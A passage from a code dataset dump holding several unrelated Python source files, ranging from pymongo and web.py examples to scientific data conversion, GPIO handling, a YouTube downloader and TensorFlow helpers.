post!\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()}\n\npost_id = posts.insert_one(post).inserted_id\n# After inserting the first document, the posts collection has actually been created on the server.\n\n\nprint(post_id)\npprint.pprint(posts.find_one())\npprint.pprint(posts.find_one({\"author\": \"Mike\"}))\n\nnew_posts = [{\"author\": \"Mike\",\n \"text\": \"Another post!\",\n \"tags\": [\"bulk\", \"insert\"],\n \"date\": datetime.datetime(2009, 11, 12, 11, 14)},\n {\"author\": \"Eliot\",\n \"title\": \"MongoDB is fun\",\n \"text\": \"and pretty easy too!\",\n \"date\": datetime.datetime(2009, 11, 10, 10, 45)}]\nresult = posts.insert_many(new_posts)\n\n\nfor 
post in posts.find():\n pprint.pprint(post)\n \nfor post in posts.find({\"author\": \"Mike\"}):\n pprint.pprint(post)\n\n","sub_path":"python/python_to_mongo/prova_server.py","file_name":"prova_server.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"66381529","text":"from Arvore import Aprendizado, Maioria, MostraArvore, Classificar\nfrom Leitura import Atributos_Exemplos\nfrom datetime import datetime as dt\nimport os\nfrom Split import split_train_test\n\nt = dt.now()\n# attributes = {0: [\"Ensolarado\", \"Nublado\", \"Chuvoso\"], 1: [\"Quente\", \"Boa\", \"Fria\"],\n# 2: [\"Alta\", \"Normal\"], 3: [\"Forte\", \"Fraco\"]}\n#\n# examples = [[\"Ensolarado\", \"Quente\", \"Alta\", \"Fraco\", \"NAO\"],\n# [\"Ensolarado\", \"Quente\", \"Alta\", \"Forte\", \"NAO\"],\n# [\"Nublado\", \"Quente\", \"Alta\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Alta\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Fria\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Fria\", \"Normal\", \"Forte\", \"NAO\"],\n# [\"Nublado\", \"Fria\", \"Normal\", \"Forte\", \"SIM\"],\n# [\"Ensolarado\", \"Boa\", \"Alta\", \"Fraco\", \"NAO\"],\n# [\"Ensolarado\", \"Fria\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Ensolarado\", \"Boa\", \"Normal\", \"Forte\", \"SIM\"],\n# [\"Nublado\", \"Boa\", \"Alta\", \"Forte\", \"SIM\"],\n# [\"Nublado\", \"Quente\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Alta\", \"Forte\", \"NAO\"]]\nexamples, attributes = Atributos_Exemplos()\nprint(dt.now() - t)\n\n# t = dt.now()\n# arvore = Aprendizado(examples, attributes, Maioria(examples))\n# print(dt.now() - t)\n\n# MostraArvore(arvore)\n\n\"\"\"\nSegmentar dados\n\"\"\"\ntrain, test = split_train_test(examples, 0.6)\nprint('Dividido')\n\nt = dt.now()\narvore = Aprendizado(train, attributes, Maioria(train))\nprint(dt.now() - t)\n\nresult = []\nfor line in test:\n result.append(Classificar(arvore, line))\n\nacerto = 0\nfor i in range(len(test)):\n print('ESPERADO: {:5} | OBTIDO: {:5}'.format(test[i][-1], result[i]))\n if result[i] == test[i][-1]:\n acerto += 1\n\nprint(acerto/len(result))\n\n\nos.system('play -nq -t alsa synth {} sine {}'.format(0.3, 440))\n# print(Classificar(arvore, [\"Ensolarado\", \"Fria\", \"Alta\", \"Forte\"]))\n","sub_path":"Laboratorio3/Classificacao.py","file_name":"Classificacao.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"292636336","text":"\nimport nmc_verification.nmc_vf_base as nmb\nimport numpy as np\nimport datetime\nimport pandas as pd\n\ndef test_read_write_micaps4():\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\grid_fo.txt\"\n grd = nmb.io.rg.read_from_micaps4(path)\n nmb.io.wg.write_to_micaps4(grd)\n sta = nmb.fun.gxy_sxy.transform(grd)\n grd1 = nmb.fun.sxy_gxy.transform(sta)\n nmb.io.wg.write_to_micaps4(grd1)\n #print(sta)\n\ndef test_read_nc():\n path = r\"K:\\paper13\\m8\\18010100.003.nc\"\n #path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\a.txt\"\n #from nmc_met_class.io.read_DataArray import read_from_nc\n grd = nmb.io.rg.read_from_nc(path)\n grd = nmb.bd.set_coords(grd,level=850,time='2019051901',dtime=\"4d\")\n #nmc.io.wg.write_to_nc(grd,scale_factor=1)\n grid0 = nmb.bd.get_grid_of_data(grd)\n\n grd0 = nmb.bd.grid_data(grid0)\n\n 
nmb.io.wg.write_to_micaps4(grd0)\n    print(grd)\n\n\ndef color_negative_red(val):\n    """\n    Takes a scalar and returns a string with\n    the css property `'color: red'` for negative\n    strings, black otherwise.\n    """\n    color = 'red' if val < 2 else 'black'\n    return 'color: %s' % color\n\ndef interpolation():\n    path = r"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\grid_fo.txt"\n    grd = nmb.io.rg.read_from_micaps4(path)\n    #grid0 = nmc.bd.get_grid_of_data(grd)\n    print(grd)\n    grid0 = nmb.bd.grid([80,130,0.125],[20,40,0.125])\n    print(grid0.tostring())\n    grd1 = nmb.fun.gxy_gxy.interpolation_linear(grd,grid0,reserve_other_dim=True)\n    print(grd1)\n    nmb.io.wg.write_to_micaps4(grd1)\n\n    path = r"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\评分站点.txt"\n    station = nmb.io.rs.read_from_micaps3(path)\n    print(station)\n    sta1 = nmb.fun.gxy_sxy.cubicInterpolation(grd1, station)\n    nmb.io.ws.write_to_micaps3(sta1)\n    print(sta1.style.applymap(color_negative_red))\n\n    pass\n\n#interpolation()\n\ndef test_read_m3():\n    path = r"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\评分站点.txt"\n    station = nmb.io.rs.read_from_micaps3(path)\n    #print(station)\n    sta4 = nmb.fun.get_from_sta_data.get_by_id_list(station, [59954, 59981])\n    #print(sta4)\n    station['data0'] = 0\n    path = r"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\rain_without0.txt"\n    sta = nmb.io.rs.read_from_micaps3(path,station= station,reserve_time_dtime_level=True)\n    #print(sta)\n    grid0 = nmb.bd.grid([70,140,0.5],[10,60,0.5])\n    background = nmb.bd.grid_data(grid0)\n    grd = nmb.fun.sxy_gxy.sta_to_grid_oa2(sta, background=background,sm=0.1)\n\n    nmb.io.wg.write_to_micaps4(grd)\n    print(grd)\n\ntest_read_m3()\n\n#test_read_write_micaps4()","sub_path":"build/lib/nmc_verification/tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"157707634","text":"# json encoder from html page\r\ndef formatgoal(value):\r\n    result = {}\r\n    fltr = []\r\n    counter = []\r\n\r\n    f = open("data.txt")\r\n    for line in f:\r\n        counter = line.split("\\t")\r\n        fltr.append(counter[1])\r\n        result[counter[1]] = counter[0]\r\n    f.close()  # close() must be called; the bare 'f.close' only referenced the method without closing the file\r\n    f = open("output.txt", "w")\r\n    for goal, id in result.items():\r\n        if goal == fltr[0]:\r\n            f.write("{" + '"Default": {}'.format(value) + ",\\n")\r\n        elif goal != fltr[-1]:\r\n            f.write('"' + goal + '": ' + id + ",\\n")\r\n        else: \r\n            f.write('"' + goal + '": ' + id + "}")\r\n\r\n    f.close()\r\n\r\n\r\nif __name__ == "__main__":\r\n    formatgoal(input("Default id: "))","sub_path":"formatgoals.py","file_name":"formatgoals.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546954630","text":"#!/usr/bin/env python\n#coding:utf-8\n#Copyright (C) dirlt\n\nimport web\nimport util\nfrom PIL import Image\n\nurls = ('/upload', 'upload',\n        '/.*', 'home')\n\napp = web.application(urls, globals())\n\nhome_html = open('home.html').read()\nclass home:\n    def GET(self):\n        return home_html\n\nimport cgi\n"""\nweb input\n\nfile_content_type = image/png\nfile_size = 3625446\nfile_path = /tmp/nginx_upload/0000000022\nfile_md5 = 1f7e1395ccc314e684eb4f46f4112308\n"""\noutput_html = open('output.html').read()\nredirect_html = open('redirect.html').read()\nTEST = True\nCACHE = False\nimport 
os\nclass upload:\n def GET(self):\n return self.POST()\n\n def POST(self):\n if not TEST:\n winput = web.input()\n path = winput['imgfile_path']\n ctype = winput['imgfile_content_type']\n fsize = int(winput['imgfile_size'])\n fmd5 = winput['imgfile_md5']\n else:\n path = './sample.jpg'\n ctype = 'image/jpeg'\n fsize = 135 * 1024\n fmd5 = 'md5-of-sample-jpg'\n if not ctype.startswith('image') or fsize > 8 * 1024 * 1024:\n return \"Not image or image file is too large(<8MB)\"\n image_html_file = '%s.html' % (fmd5)\n image_html_path = '/tmp/ascii_image_output/%s' % (image_html_file)\n # if cached.\n if CACHE and os.path.exists(image_html_path): return redirect_html % (locals())\n # resize image.\n rim = Image.open(path).convert('RGB')\n W = 120\n im = rim.resize((W, int(rim.size[1] * W / rim.size[0])))\n # write html file.\n image_html = util.image2html(im, constrast = True, font_color = True)\n with open(image_html_path, 'w') as fh: fh.write(output_html % (locals()))\n return redirect_html % (locals())\n\nwsgiapp = app.wsgifunc()\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"codes/py/ascii-image/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"537719014","text":"# import libraries\nimport os\nfrom osgeo import gdal\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom osgeo import osr\nimport h5py\n\n'''xdist = (Enx - E0) / float(nx)\nydist = (Nny - N0) / float(ny)\nrtx = (Eny - E0) / float(ny)\nrty = (Nnx - N0) / float(nx)'''\n\n\ndef getNcPath(NetCdf_data_path):\n\treturn [f for f in os.listdir(NetCdf_data_path) if f.endswith('.nc')]\n\ndef getNCGeoTrans2(file, LonS, LatS ):\n '''Extract Geotransform from Longitude and Latitude destination file'''\n \n f = h5py.File(file, 'r')\n lon = f[LonS][:]\n lat = f[LatS][:]\n\n ny, nx = lon.shape\n\n E0, Enx, Eny, Enxny = lon[0, 0], lon[0, nx-1], lon[ny-1, 0], lon[ny-1, nx-1]\n N0, Nny, Nnx, Nnxny = lat[0, 0], lat[ny-1, 0], lat[0, nx-1], lat[ny-1, nx-1]\n\n A = np.array([[1, nx, 0, 0, 0, 0],[1, 0, ny, 0, 0, 0],[0, 0, 0, 1, 0, ny],[0, 0, 0, 1, nx, 0],[1, nx, ny, 0, 0, 0],[0, 0, 0, 1, nx, ny],[1, 0, 0, 0, 0, 0],[0, 0, 0, 1, 0, 0]])\n C = np.array([Enx, Eny, Nny, Nnx, Enxny, Nnxny, E0, N0]).reshape(8,1)\n Gt = np.linalg.solve(np.dot(A.T,A), np.dot(A.T,C))\n return (Gt[0], Gt[1], Gt[2], Gt[3], Gt[4], Gt[5])\n\n# location to the inputfile\nfilePath = \"D:/Image/Poe/Acolyte/S2B_MSIL1C_20180320T230859last/\"\nNetCdfFilename = getNcPath(filePath)\nFileLocation = filePath+NetCdfFilename[0]\n'''if os.path.exists(FileLocation[:-3]):\n\tif os.path.exists(FileLocation[:-3]+'_bis'):\n\t\tos.mkdir(FileLocation[:-3]+'_bis_bis')\n\telse:\n\t\tos.mkdir(FileLocation[:-3]+'_bis')\nelse:\n\tos.mkdir(FileLocation[:-3])'''\n\n# open the file\ndat = gdal.Open(FileLocation, gdal.GA_ReadOnly)\nif dat == None:\n\tprint('oups')\n \n# Get the Precipitation dataset\ndataset = dat.GetSubDatasets()[6]\n\n# read the precipitation dataset\ndata = gdal.Open(dataset[0],gdal.GA_ReadOnly)\n \n# get the data of the precipitation dataset\ndataBand = data.ReadAsArray()\n \n# get geotransform\n'''GeoT = data.GetGeoTransform()'''\nLonS = 'lon'\nLatS = 'lat'\nGeoT = getNCGeoTrans2(FileLocation, LonS, LatS )\nprint(GeoT)\n \n# set geotif driver\ndriver = gdal.GetDriverByName( 'GTiff' )\n \n# get x,y dimensions of the map\nRastXsize = data.RasterXSize\nRastYsize = data.RasterYSize\n \n# set output name\noutname = \"testFullIm.tif\"\n \n# set 
projection\ntarget = osr.SpatialReference()\ntarget.ImportFromEPSG(4326)\n \n# write dataset to disk\noutputDataset = driver.Create(outname, RastXsize,RastYsize, 1,gdal.GDT_Float32)\noutputDataset.SetGeoTransform(GeoT)\noutputDataset.SetProjection(target.ExportToWkt())\noutputDataset.GetRasterBand(1).WriteArray(dataBand)\noutputDataset.GetRasterBand(1).SetNoDataValue(-9999)\noutputDataset = None","sub_path":"Poe/Scripts/OpticalDataManagement/ConvertNetcdf2Tif.py","file_name":"ConvertNetcdf2Tif.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"351217449","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = \"encyclopedia\"\nurlpatterns = [\n    path(\"\", views.index, name=\"index\"),\n    re_path(r\"^wiki/(?P<title>\\w*)/$\", views.wiki, name=\"wiki\"),\n    path(\"search\", views.search, name=\"search\"),\n    path(\"new\", views.new, name=\"new\"),\n    path(\"edit/<str:title>\", views.edit, name=\"edit\")\n]\n","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"298779995","text":"'''\nParse input and run appropriate code.\nDon't use this file for the actual work; only minimal code should be here.\nWe just parse input and call methods from other modules.\n'''\nfrom __future__ import division, print_function\n#do NOT import ways. This should be done from other files\n#simply import your modules and call the appropriate functions\nfrom astar import Astar\nfrom assured import get_assured_path\nfrom search import AstarTimeEvaluator, AstarLightsEvaluator\n\n\ndef simple(source, target):\n    'call function to find path, and return list of indices' \n    astar = Astar(evaluator = AstarTimeEvaluator())\n    path = astar.run_astar(source, target)\n    return path\n\n    \ndef lights(source, target):\n    'call function to find resume_path, and return list of indices'\n    astar = Astar(evaluator = AstarLightsEvaluator()) \n    path = astar.run_astar(source, target)\n    return path\n    \ndef assured(source, target, time, confidence):\n    N = 20\n    K = 5\n    astar = Astar(evaluator = AstarTimeEvaluator())\n    path = get_assured_path(source, target, time, confidence, astar, N, K)\n    return path\n\n\ndef dispatch(argv):\n    source, target = int(argv[2]), int(argv[3])\n    try:\n        if argv[1] == 'simple':\n            resume_path = simple(source, target)\n        elif argv[1] == 'lights':\n            resume_path = lights(source, target)\n        elif argv[1] == 'assured':\n            time, confidence = int(argv[4]), float(argv[5])\n            resume_path = assured(source, target, time, confidence)\n        print(' '.join(str(j) for j in resume_path))\n    except Exception:\n        print('Cannot find a path')\n    \n    \n    \n\nif __name__ == '__main__':\n    from sys import argv\n    dispatch(argv)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"244411202","text":"#! /usr/bin/env python\n#\n# EventRate.py\n#\n# This module is the implementation of the stage2 analysis. The main\n# purpose of stage2 is to combine the \"oscillated Flux maps\" with the\n# weighted effective areas to create oscillated event rate maps,\n# using the true information.\n# \n# If desired, this will create a .json output file with the results of\n# the current stage of processing.\n#\n# author: Timothy C. 
Arlen\n#\n# tca3@psu.edu\n#\n# date: April 8, 2014\n#\n\nimport os,sys\nimport numpy as np\nimport logging\nfrom argparse import ArgumentParser, RawTextHelpFormatter\nfrom utils.utils import set_verbosity,is_equal_binning\nfrom utils.json import from_json, to_json\nfrom AeffService import AeffServiceMC\nfrom scipy.constants import Julian_year\n\ndef get_event_rates(osc_flux_maps,sim_file=None,livetime=None,nu_xsec_scale=None,\n                    nu_bar_xsec_scale=None,**kwargs):\n    '''\n    Main function for this module, which returns the event rate maps\n    for each flavor and interaction type, using true energy and zenith\n    information. The content of each bin will be the weighted aeff\n    multiplied by the oscillated flux, so that the returned dictionary\n    will be of the form:\n    {'nue': {'cc':map,'nc':map},\n     'nue_bar': {'cc':map,'nc':map}, ...\n     'nutau_bar': {'cc':map,'nc':map} }\n    '''\n\n    # Verify consistent binning.\n    ebins = osc_flux_maps['nue']['ebins']\n    czbins = osc_flux_maps['nue']['czbins']\n    flavours = ['nue','numu','nutau','nue_bar','numu_bar','nutau_bar']\n    if not np.alltrue([is_equal_binning(ebins,osc_flux_maps[nu]['ebins']) for nu in flavours]):\n        raise Exception('Osc flux maps have different energy binning!')\n    if not np.alltrue([is_equal_binning(czbins,osc_flux_maps[nu]['czbins']) for nu in flavours]):\n        raise Exception('Osc flux maps have different coszen binning!')\n\n    logging.info(\"Defining aeff_service...\")\n    aeff_service = AeffServiceMC(ebins,czbins,sim_file)\n    aeff_dict = aeff_service.get_aeff()\n    \n    # apply the scaling for nu_xsec_scale and nubar_xsec_scale...\n    \n    event_rate_maps = {}\n    for flavour in flavours:\n        osc_flux_map = osc_flux_maps[flavour]['map']\n        int_type_dict = {}\n        for int_type in ['cc','nc']:\n            event_rate = osc_flux_map*aeff_dict[flavour][int_type]*livetime*Julian_year\n            int_type_dict[int_type] = {'map':event_rate,\n                                       'ebins':ebins,\n                                       'czbins':czbins}\n        event_rate_maps[flavour] = int_type_dict\n    \n    return event_rate_maps\n\nif __name__ == '__main__':\n\n    #Only show errors while parsing \n    set_verbosity(0)\n    parser = ArgumentParser(description='Take an oscillated flux file '\n                            'as input and write out a set of oscillated event counts. ',\n                            formatter_class=RawTextHelpFormatter)\n    parser.add_argument('osc_flux_file',metavar='FLUX',type=from_json,\n                        help='''JSON osc flux input file with the following parameters:\n      {\"nue\": {'czbins':[], 'ebins':[], 'map':[]}, \n       \"numu\": {...},\n       \"nutau\": {...},\n       \"nue_bar\": {...},\n       \"numu_bar\": {...},\n       \"nutau_bar\": {...} }''')\n    parser.add_argument('weighted_aeff_file',metavar='WEIGHTFILE',type=str,\n                        help='''HDF5 File containing data from all flavours for a particular instrumental geometry. 
\nExpects the file format to be:\n {\n 'nue': {\n 'cc': {\n 'weighted_aeff': np.array,\n 'true_energy': np.array,\n 'true_coszen': np.array,\n 'reco_energy': np.array,\n 'reco_coszen': np.array\n },\n 'nc': {...\n }\n },\n 'nue_bar' {...},...\n } ''')\n parser.add_argument('--livetime',type=float,default=1.0,\n help='''livetime in years to re-scale by.''')\n parser.add_argument('--nu_xsec_scale',type=float,default=1.0,\n help='''Overall scale on nu xsec.''')\n parser.add_argument('--nubar_xsec_scale',type=float,default=1.0,\n help='''Overall scale on nu_bar xsec.''')\n parser.add_argument('-o', '--outfile', dest='outfile', metavar='FILE', type=str,\n action='store',default=\"event_rate.json\",\n help='''file to store the output''')\n parser.add_argument('-v', '--verbose', action='count', default=0,\n help='''set verbosity level''')\n args = parser.parse_args()\n\n #Set verbosity level\n set_verbosity(args.verbose)\n\n livetime = args.livetime\n nu_xsec_scale = args.nu_xsec_scale\n nubar_xsec_scale = args.nubar_xsec_scale\n event_param_dict = {'livetime':livetime,'nu_xsec_scale':nu_xsec_scale,\n 'nubar_xsec_scale':nubar_xsec_scale}\n\n for name,param in zip([\"livetime\",\"nu xs scale\",\"nubar xs scale\"],\n [livetime,nu_xsec_scale,nubar_xsec_scale]):\n logging.debug(\"%14s: %s \"%(name,param))\n\n logging.info(\"Getting oscillated flux...\") \n osc_flux_maps = args.osc_flux_file\n simfile = args.weighted_aeff_file\n\n event_rate_maps = get_event_rates(osc_flux_maps,simfile,livetime,\n nu_xsec_scale,nubar_xsec_scale)\n\n event_rate_maps['params'] = dict(osc_flux_maps['params'].items() + \n event_param_dict.items())\n logging.info(\"Saving output to .json file...\")\n to_json(event_rate_maps,args.outfile)\n \n \n","sub_path":"trigger/EventRate.py","file_name":"EventRate.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"85337369","text":"from threading import Thread\nfrom rpicenter import state\nfrom rpicenter.adapter import Adapter\n\nimport RPi.GPIO as gpio\n\ndef _check_slot_used(device, slot):\n\tfor a in state._adapters:\n\t\tif a._device_object_id == id(device) and a._slot == slot:\n\t\t\treturn True\n\treturn False\n\ndef _check_pin_used(gpio_pin):\n\tfor a in state._adapters:\n\t\tif a._gpio_pin == gpio_pin:\n\t\t\treturn True\n\treturn False\n\ndef reg_adapter(device, slot, gpio_pin):\n\tif _check_slot_used(device, slot):\n\t\traise Exception('Slot {} is already used'.format(slot))\n\t\n\tif _check_pin_used(gpio_pin):\n\t\traise Exception('GPIO pin {} is already used'.format(gpio_pin))\n\t\n\tstate._adapters.append(Adapter(id(device), slot, gpio_pin))\n\ndef reg_device(device):\n\tfor d in state._devices:\n\t\tif id(d) == id(device):\n\t\t\traise Exception('Device is already registered')\n\tstate._devices.append(device)\n\tstate._device_threads.append(Thread(target = device.loop))\n\ndef loop():\n\tfor t in state._device_threads:\n\t\tt.start()\n\ndef wait():\n\tfor t in state._device_threads:\n\t\tt.join()\n\ndef request_stop():\n\tfor d in state._devices:\n\t\td.request_stop()\n\ndef cleanup():\n\tfor d in state._devices:\n\t\td.cleanup()\t\n\tstate._device_threads = []\n\tstate._devices = []\n\tstate._adapters = []\n\t\n\tgpio.cleanup()\n\t\n\n\n\n\n\n\n","sub_path":"rpicenter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} 
+{"seq_id":"399449565","text":"import pytube\nimport os\nimport subprocess\n# 다운 받을 동영상 url 지정\nyt = pytube.YouTube('https://www.youtube.com/watch?v=Kbj2Zss-5GY')\n\nvideos = yt.streams.all()\n\nfor i in range(len(videos)):\n print(i,',',videos[i])\n\ndown_dir = \"C:\\YouTube\"\n\n\ncnum =int(input(\"다운 받을 화질은(0~21 입력)\"))\n\nvideos[cnum].download(down_dir)\n\nnewfilename =input('변환할 mp3 파일명은?')\noriginalfilename =videos[cnum].default_filename\n\n\n\nsubprocess.call(['ffmpeg', '-i',\nos.path.join(down_dir,originalfilename),\nos.path.join(down_dir,newfilename)])\n\n\nprint('동영상 다운로드 및 mp3 변환완료')\n","sub_path":"youtube-download.py","file_name":"youtube-download.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"427381389","text":"import math\n\n#Node class, handles everything to do with nodes themselves\nclass Node(object):\n #initialization\n def __init__(self, value):\n self.value = value\n self.adjacent = {}\n\n #add adjacent node\n def add_next(self, nextTo, weight):\n self.adjacent[nextTo] = weight\n\n #return nodes value (not node location)\n def get_value(self):\n return self.value\n\n #return length of adjacent dictionary\n def get_adjacent_length(self):\n return len(self.adjacent)\n\n #return adjacent dictionary as a list\n def get_adjacent_as_list(self):\n printList = []\n for item in self.adjacent:\n printList.append(self.adjacent[item].get_value())\n return printList\n\n #return adjacent dictionary as a dictionary\n def return_adjacent(self):\n return self.adjacent\n\n #return weight of node argument\n def get_weight(self, node):\n return self.adjacent[node]\n \n#Graph class, allows the actual creation of the graph, and handles all graph related queries\nclass Graph:\n \n #initialization\n def __init__(self):\n self.dict = {}\n\n #creates and adds node to graph\n def add_node(self, value):\n node = Node(value)\n self.dict[value] = node\n print(\"Node: \" + str(value) + \" has been created\")\n\n #adds adjacent node to node\n def add_edge(self, node, adjacent_node, weight=0):\n self.dict[node].add_next(self.dict[adjacent_node], weight)\n self.dict[adjacent_node].add_next(self.dict[node], weight)\n\n #print graph in a readable form\n def print_graph(self):\n keyList = []\n for key in self.dict:\n keyList.append(key)\n for item in keyList:\n print(str(item) + \", adjacent nodes: \" +\n str(self.dict[item].get_adjacent_as_list()) +\n \" (\" + str(self.dict[item].get_adjacent_length()) + \")\")\n\n #DFS function implementation. runs DFS algorithm, and returns\n def depth_first_search(self, node):\n stack = []\n visited = []\n stack.append(node)\n while len(stack) != 0:\n u = stack.pop()\n if u not in visited:\n visited.append(u)\n for item in self.dict[u].return_adjacent():\n nodey = item.get_value()\n stack.append(nodey)\n return visited\n\n #BFS function implementation. 
runs BFS algorithm, and returns\n def breadth_first_search(self, node):\n stack = []\n visited = []\n stack.append(node)\n while len(stack) != 0:\n u = stack.pop(0)\n if u not in visited:\n visited.append(u)\n for item in self.dict[u].return_adjacent():\n nodey = item.get_value()\n stack.append(nodey)\n return visited\n\n #dijkstra algorithm, 2 arguments\n def dijkstra(self, node_source, node_destination):\n #print(self.dict[node_source].return_adjacent())\n print(\"Algorithm start\")\n v = node_source\n tw = {}\n fastest_route = []\n for item in self.dict:\n tw[item] = math.inf\n tw[node_source] = 0\n visited = []\n\t\t\n\t#loop as long as v is not equal to node_destination\n while v != node_destination:\n #return node adjacent list, loop over each item\n for item in self.dict[v].return_adjacent():\n theDict = self.dict[v].return_adjacent()\n if tw[v] + theDict[item] < tw[item.get_value()]:\n print(tw[v])\n print(theDict[item])\n print(tw[item.get_value()])\n tw[item.get_value()] = tw[v]+theDict[item]\n fastest_route.append(v)\n \n visited.append(v)\n print(visited)\n mini = math.inf\n #return node adjacent list, loop over each item again\n for item in self.dict[v].return_adjacent():\n print(str(item.get_value()) + \" = item\")\n #not in visited list, and meets critera\n if item.get_value() not in visited and tw[item.get_value()] < mini:\n v = item.get_value()\n mini = tw[item.get_value()]\n print(str(v) + \" = v integer\")\n\n #removes duplicate nodes from list, prints in readable way\n tempList = []\n for i in range(len(fastest_route)):\n if fastest_route[i] not in tempList:\n tempList.append(fastest_route[i])\n print(\"The fastest route to your destination node is: \" + str(tempList))\n \n \n \n\t\t\n\t\n\n\n\n#Runs program with nodes that allow it to work.\nif __name__ == '__main__':\n\n graph = Graph()\n\n## commented due to no longer use for dijkstra's.\n## graph.add_node(5)\n## graph.add_node(1)\n## graph.add_node(3)\n## graph.add_node(4)\n## graph.add_node(7)\n## graph.add_node(9)\n## graph.add_node(2)\n## graph.add_edge(5, 1, 15)\n## graph.add_edge(1, 3)\n## graph.add_edge(3, 4)\n## graph.add_edge(4, 7, 12)\n## graph.add_edge(7, 9, 9)\n## graph.add_edge(9, 2)\n## graph.add_edge(2, 5)\n #graph.print_graph()\n\n #graph.dijkstra(5, 2)\n## #runs DFS and BFS\n## dfs = graph.depth_first_search(5)\n## bfs = graph.breadth_first_search(5)\n##\n## #writes DFS and BFS traversal to text file.\n## with open('graph_traversals.txt', 'a') as file:\n## file.write(\"DFS: \" + str(dfs) + \"\\n\")\n## file.write(\"BFS: \" + str(bfs) + \"\\n\")\n## file.close()\n\n rlist = [1,11,6,7,10,15,3,4]\n for i in range(20):\n if i in rlist:\n graph.add_node(i)\n\n graph.add_edge(1, 11, 5)\n graph.add_edge(1, 10, 3)\n graph.add_edge(1, 3, 2)\n graph.add_edge(11, 6, 1)\n graph.add_edge(11, 10, 1)\n graph.add_edge(10, 15, 3)\n graph.add_edge(10, 3, 1)\n graph.add_edge(10, 4, 2)\n graph.add_edge(6, 15, 1)\n graph.add_edge(6, 7, 9)\n graph.add_edge(15, 4, 1)\n graph.add_edge(15, 7, 19)\n graph.add_edge(4, 7, 10)\n graph.add_edge(3, 10, 1)\n graph.add_edge(3, 4, 4)\n\n graph.dijkstra(1, 7)\n\n \n\n","sub_path":"JackBond15.py","file_name":"JackBond15.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"254070346","text":"import tensorflow as tf\nimport numpy as np\n\nREG_VARS = 'reg_vars'\n\n\ndef linear(X, dout, name, bias=True):\n with tf.variable_scope(name):\n dX = int(X.get_shape()[-1])\n W = tf.get_variable('W', 
shape=(dX, dout))\n        tf.add_to_collection(REG_VARS, W)\n        if bias:\n            b = tf.get_variable('b', initializer=tf.constant(np.zeros(dout).astype(np.float32)))\n        else:\n            b = 0\n        return tf.matmul(X, W) + b\n\n\ndef relu_layer(X, dout, name):\n    return tf.nn.relu(linear(X, dout, name))\n\n\ndef get_session_config():\n    session_config = tf.ConfigProto()\n    session_config.gpu_options.allow_growth = True\n    return session_config\n","sub_path":"inverse_rl/models/tf_util.py","file_name":"tf_util.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"127715139","text":"# Copyright © 2020 baneon - MIT License\n# See `LICENSE` included in the source distribution for details.\n\nimport sys\nimport pathlib\n\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtCore import pyqtSlot, Qt, QVariant\n\nfrom gui.MainWindow import Ui_MainWindow\nfrom gui.ItemEdit import Ui_Dialog\n\n\n# === AlignCenterText ===\nclass AlignDelegate(QtWidgets.QStyledItemDelegate):\n\n    def initStyleOption(self, option, index):\n        super(AlignDelegate, self).initStyleOption(option, index)\n        option.displayAlignment = Qt.AlignCenter\n# === AlignCenterText ===\n\n\nclass Dialog(QtWidgets.QDialog):\n\n    def __init__(self):\n        super(Dialog, self).__init__()\n        self.ui = Ui_Dialog()\n        self.ui.setupUi(self)\n\n\nclass main(QtWidgets.QMainWindow):\n\n    def __init__(self):\n        super(main, self).__init__()\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n\n        for row in 